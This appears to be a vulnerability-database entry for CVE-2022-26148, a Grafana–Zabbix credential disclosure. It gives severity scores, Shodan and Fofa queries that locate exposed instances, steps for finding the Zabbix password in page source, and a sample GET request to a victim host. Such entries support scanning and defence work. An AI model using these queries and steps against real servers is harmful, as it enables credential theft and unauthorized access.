| Title | Grafana & Zabbix Integration - Credentials Disclosure |
|---|---|
| Author | Geekby |
| Severity | Critical |
| Impact | An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. |
| Remediation | Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.87108 |
| CVE ID | CVE-2022-26148 |
| CWE ID | CWE-312 |
| Shodan Query | title:"Grafana"cpe:"cpe:2.3:a:grafana:grafana"http.title:"grafana" |
| Fofa Query | app="Grafana"title="grafana"app="grafana" |
| Tags | cve cve2022 grafana zabbix exposure vuln |
Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
GET /login?redirect=%2F HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26148.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-26148.pcap
N/AN/A